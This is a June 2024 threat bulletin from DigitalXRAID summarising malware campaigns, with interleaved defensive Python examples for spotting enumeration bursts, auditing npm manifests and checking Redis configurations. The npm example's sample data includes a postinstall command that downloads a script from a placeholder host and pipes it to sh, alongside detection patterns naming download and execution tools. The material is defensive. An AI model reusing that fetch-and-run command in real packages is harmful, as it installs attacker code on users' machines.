
DigitalXRAID

Threat Pulse – June 2024

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats. 

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available. 

Unveiling SpiceRAT: The latest tool targeting EMEA and Asia 

Researchers have discovered a new remote access trojan (RAT) dubbed SpiceRAT, employed by the threat actor SneakyChef in a recent malicious campaign.  

The campaign targeted government agencies across multiple countries in Europe, the Middle East, Africa, and Asia. SpiceRAT was delivered alongside SugarGh0st malware through phishing emails with RAR attachments containing LNK or HTA files as initial vectors.  

SpiceRAT utilises sideloading techniques, leveraging legitimate executables to load malicious components. It gathers system reconnaissance data, communicates with command-and-control servers, and can download additional plugins to expand its capabilities.  

Malvertising Campaign Leads to Execution of Oyster Backdoor 

Researchers have observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.  

The installers were being used to drop a backdoor identified as Oyster, aka Broomstick.  

Following execution of the backdoor, we have observed enumeration commands indicative of hands-on-keyboard activity as well as the deployment of additional payloads. 
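The "enumeration commands indicative of hands-on-keyboard activity" mentioned above are one of the more reliable signals a SOC can alert on, because the installer-then-discovery pattern is rare in benign software. The following is an added example, not code from DigitalXRAID or the Oyster research: a sliding-window rule over process-creation records that fires when one parent process spawns several different discovery tools in a short span. The records are constructed (roughly the fields of a Sysmon Event ID 1 entry), and the tool list, window and threshold are assumptions to tune per environment.

```python
"""Flag a burst of discovery commands spawned by a single parent process.

Added example (not from DigitalXRAID or the cited research). SAMPLE_EVENTS
are constructed; DISCOVERY_TOOLS, the window and min_distinct are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Built-in tools commonly run back-to-back during manual host/domain enumeration.
DISCOVERY_TOOLS = {"whoami", "net", "net1", "nltest", "ipconfig", "systeminfo",
                   "tasklist", "quser", "nslookup", "arp", "hostname"}

# Constructed sample events: (utc_time, parent_image, image, command_line).
SAMPLE_EVENTS = [
    # A fake installer fetched from a malvertising lure runs five tools in 40 s.
    ("2024-06-12T09:00:01", r"C:\Users\alice\Downloads\ChromeSetup.exe",
     r"C:\Windows\System32\whoami.exe", "whoami /all"),
    ("2024-06-12T09:00:09", r"C:\Users\alice\Downloads\ChromeSetup.exe",
     r"C:\Windows\System32\net.exe", "net user"),
    ("2024-06-12T09:00:15", r"C:\Users\alice\Downloads\ChromeSetup.exe",
     r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("2024-06-12T09:00:27", r"C:\Users\alice\Downloads\ChromeSetup.exe",
     r"C:\Windows\System32\nltest.exe", "nltest /dclist:"),
    ("2024-06-12T09:00:40", r"C:\Users\alice\Downloads\ChromeSetup.exe",
     r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    # Benign noise: one command from Explorer, and a service running the same
    # tool twice an hour apart.
    ("2024-06-12T09:02:00", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\ipconfig.exe", "ipconfig /flushdns"),
    ("2024-06-12T08:00:00", r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\hostname.exe", "hostname"),
    ("2024-06-12T09:00:00", r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\hostname.exe", "hostname"),
]


def tool_name(image_path):
    """'C:\\Windows\\System32\\net.exe' -> 'net'."""
    base = ntpath.basename(image_path).lower()
    return base[:-4] if base.endswith(".exe") else base


def detect_discovery_bursts(events, window=timedelta(seconds=120), min_distinct=4):
    """Return one alert per parent that spawned >= min_distinct different
    discovery tools inside some span no longer than `window`."""
    by_parent = defaultdict(list)
    for ts, parent, image, cmdline in events:
        name = tool_name(image)
        if name in DISCOVERY_TOOLS:
            by_parent[parent.lower()].append((datetime.fromisoformat(ts), name, cmdline))

    alerts = []
    for parent, hits in by_parent.items():
        hits.sort()  # time order
        best = None
        start = 0
        for end in range(len(hits)):
            # Shrink the window from the left until it spans <= `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            distinct = {name for _, name, _ in hits[start:end + 1]}
            if len(distinct) >= min_distinct and (best is None or len(distinct) > len(best["tools"])):
                best = {
                    "parent": parent,
                    "first_seen": hits[start][0].isoformat(),
                    "tools": sorted(distinct),
                    "command_lines": [c for _, _, c in hits[start:end + 1]],
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

Keying on the parent image rather than the user keeps a single user's normal troubleshooting (one `ipconfig`, one `nslookup`) below threshold while still grouping everything a dropped installer launches; in production, add the parent's process GUID so two unrelated processes with the same path are not merged.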

Info Stealing Campaign Uses DLL Sideloading Through Legitimate Cisco Webex’s Binaries for Initial Execution and Defence Evasion 

Researchers uncovered a sophisticated and evasive attack campaign targeting users in Latin America and Asia Pacific through trojanised copies of the Cisco Webex Meetings App.  

This campaign employed a stealthy malware loader, known as HijackLoader, and an information-stealing module identified as Vidar Stealer, to siphon off credentials and sensitive data undetected by leveraging legitimate processes.  

GrimResource – Microsoft Management Console for initial access and evasion 

Researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource.  

GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (mmc.exe) with minimal security warnings, ideal for gaining initial access and evading defences.  

New InnoSetup Malware Created Upon Each Download Attempt 

Researchers have discovered a new malware distribution technique where malicious code is dynamically generated for each download attempt, evading detection through unique hash values.  

The malware, termed ‘InnoLoader’, disguises itself as a legitimate software installer and runs a multi-stage sequence that downloads and executes additional payloads, including information stealers, adware, and malicious browser plugins.  

It employs evasion tactics like varying C2 responses and downloading benign files to hinder analysis.  

Malicious npm package targets AWS users 

Researchers discovered a malicious package named legacyreact-aws-s3-typescript on the npm repository.  

It mimicked a popular legitimate package, react-aws-s3-typescript, designed to facilitate file uploads to Amazon S3 Buckets.  

Initially, the package appeared benign, but a later version included a postinstall script that downloaded and executed a backdoor payload. The package’s history demonstrates the challenges of monitoring open source repositories for threats.  
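The two properties that made legacyreact-aws-s3-typescript dangerous, a name one prefix away from a real package and a lifecycle script that runs automatically at install time, are both visible in package.json before anything executes. The following is an added example, not code from DigitalXRAID or the npm research: it audits a set of manifests for install-time hooks (and whether the hook looks like it downloads or runs something), and flags names that mimic an allowlist of packages the team actually uses. The manifests, version numbers and allowlist are constructed, and the payload URL is a placeholder.

```python
"""Audit npm package.json manifests for install hooks and lookalike names.

Added example (not from DigitalXRAID or the cited research). KNOWN_PACKAGES
is an assumed allowlist; SAMPLE_MANIFESTS and their versions are made up.
"""
import json
import re

# Packages the project is known to depend on (assumed allowlist).
KNOWN_PACKAGES = ["react-aws-s3-typescript", "aws-sdk", "lodash"]

# npm runs these scripts automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Tokens suggesting a hook fetches or executes code rather than building it.
RISKY = re.compile(
    r"curl|wget|Invoke-WebRequest|https?://|\bsh\b|bash|node -e|eval\(|child_process",
    re.I,
)

SAMPLE_MANIFESTS = {
    "legacyreact-aws-s3-typescript": json.dumps({
        "name": "legacyreact-aws-s3-typescript", "version": "1.0.4",
        # constructed: the kind of hook the page describes (download + execute)
        "scripts": {"postinstall": "curl -s https://payload.example.invalid/setup.sh | sh"},
    }),
    "react-aws-s3-typescript": json.dumps({
        "name": "react-aws-s3-typescript", "version": "1.1.1",
        "scripts": {"build": "tsc"},
    }),
    "lodash": json.dumps({"name": "lodash", "version": "4.17.21"}),
    "loadsh": json.dumps({"name": "loadsh", "version": "0.0.1"}),  # transposed letters
}


def levenshtein(a, b):
    """Edit distance between two strings (standard dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name):
    """Return the allowlisted package `name` resembles, or None."""
    if name in KNOWN_PACKAGES:
        return None
    for known in KNOWN_PACKAGES:
        # prefix/suffix squats ("legacy" + name) or small typos
        if known in name or levenshtein(name, known) <= 2:
            return known
    return None


def audit_manifests(manifests):
    """Return findings for each manifest with install hooks or a lookalike name."""
    findings = []
    for key, raw in manifests.items():
        pkg = json.loads(raw)
        issues = []
        scripts = pkg.get("scripts", {})
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                cmd = scripts[hook]
                level = "risky" if RISKY.search(cmd) else "present"
                issues.append(f"{hook} hook {level}: {cmd}")
        target = lookalike_of(pkg.get("name", key))
        if target:
            issues.append(f"name resembles allowlisted package {target!r}")
        if issues:
            findings.append({"package": key, "version": pkg.get("version"), "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_manifests(SAMPLE_MANIFESTS):
        print(finding)
```

In a real pipeline the manifests come from walking node_modules or from the lockfile's resolved tarballs; an install hook is a review signal rather than proof of malice (many native modules legitimately compile in `install`), so the practical control is to run `npm install --ignore-scripts` in CI and re-enable scripts only for packages that have been reviewed.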

Attackers Exploiting Public Cobalt Strike Profiles 

This report discusses recent findings of malicious Cobalt Strike infrastructure and malicious Cobalt Strike samples that leverage publicly available Malleable C2 profiles for evasion.  

Despite its defensive cybersecurity use, threat actors continue exploiting Cobalt Strike’s malleable and evasive nature, posing a significant threat.  

The analysis also emphasises the adaptability of attackers in modifying public profiles to evade detection, highlighting the arms race against evolving threats.  

P2PInfect botnet targets Redis servers with new ransomware module 

The peer-to-peer malware botnet known as P2PInfect has been found targeting misconfigured Redis servers with ransomware and cryptocurrency miners.  

The development marks the threat’s transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation.  

It typically spreads by abusing the Redis replication feature: the victim instance is turned into a follower (replica) of an attacker-controlled server, which then lets the threat actor issue arbitrary commands to it. 

The Rust-based worm also features the ability to scan the internet for more vulnerable servers, not to mention incorporating an SSH (Secure Shell) password sprayer module that attempts to log in using common passwords.  
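Every stage of the P2PInfect chain described above, the internet scan, the replication takeover and the follow-on ransomware and miner, depends on a Redis instance being reachable and unauthenticated with its replication commands available. The following is an added example, not code from DigitalXRAID or the P2PInfect research: a small audit of a redis.conf that reports each of those exposures, run against a constructed weak configuration and a constructed hardened one. The directives used (`bind`, `protected-mode`, `requirepass`, `user`, `rename-command`, `replicaof`) are real redis.conf settings; the sample contents and the placeholder password are made up.

```python
"""Audit redis.conf for the misconfigurations a Redis worm relies on.

Added example (not from DigitalXRAID or the cited research). WEAK_CONF and
HARDENED_CONF are constructed; the password value is a placeholder.
"""
import shlex

# bind values that expose the instance on every interface
WILDCARD_BINDS = {"0.0.0.0", "::", "*"}

WEAK_CONF = """
# constructed: Internet-exposed, no authentication, replication left enabled
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """
# constructed: loopback only, auth required, replication commands disabled
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass CHANGEME-use-a-long-random-secret
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
rename-command DEBUG ""
"""


def parse_conf(text):
    """Return [(directive, [args...])] with comments and blank lines dropped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted args such as ""
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checks fired."""
    entries = parse_conf(text)
    findings = []

    # 1. Network exposure: no bind at all, or a wildcard bind.
    binds = [a for d, args in entries if d == "bind" for a in args]
    if not binds or any(b.lstrip("-") in WILDCARD_BINDS for b in binds):
        findings.append("listens on all interfaces (no bind directive or wildcard bind)")

    # 2. protected-mode explicitly switched off (default since Redis 3.2 is yes).
    pm = [args for d, args in entries if d == "protected-mode"]
    if pm and pm[-1][:1] != ["yes"]:
        findings.append("protected-mode is disabled")

    # 3. Authentication: requirepass or an ACL user with a password (>pw or #hash).
    has_auth = any(d == "requirepass" and args for d, args in entries) or any(
        d == "user" and any(a.startswith((">", "#")) for a in args) for d, args in entries
    )
    if not has_auth:
        findings.append("no authentication (no requirepass or ACL user password)")

    # 4. Replication commands still callable: an attacker can make this node a
    #    replica of a server they control.
    disabled = {
        args[0].upper()
        for d, args in entries
        if d == "rename-command" and len(args) == 2 and args[1] == ""
    }
    if not {"SLAVEOF", "REPLICAOF"} <= disabled:
        findings.append("SLAVEOF/REPLICAOF not disabled: instance can be turned into "
                        "a replica of an attacker-controlled server")

    # 5. An existing replica relationship should be verified, not assumed.
    for d, args in entries:
        if d in ("replicaof", "slaveof"):
            findings.append(f"configured as replica of {' '.join(args)}: verify this master is yours")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "OK")
```

On Redis 6 and later, ACL rules (`user` directives or the ACL commands) are the preferred way to restrict who may call `REPLICAOF` and `CONFIG`; `rename-command` is shown here because it is still honoured and is the simplest single-line mitigation. Neither replaces the network control: a Redis port should never be reachable from the internet, and the worm's SSH password spraying is a reminder to pair this with key-only SSH authentication on the same hosts.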

Fickle Stealer Distributed via Multiple Attack Chains 

A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts.  

Industry specialists are aware of four different distribution methods — namely VBA dropper, VBA downloader, link downloader, and executable downloader — with some of them using a PowerShell script to bypass User Account Control (UAC) and execute Fickle Stealer.  

The stealer targets crypto wallets, web browsers, AnyDesk, Discord, Steam, FileZilla, Skype and Telegram. It also periodically sends information about the victim, including country, city, IP address, operating system version, computer name, and username, to a Telegram bot controlled by the attacker. 

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, whilst you take care of business.    

Talk to the team to see how you can start protecting your business against cyberattacks today. 
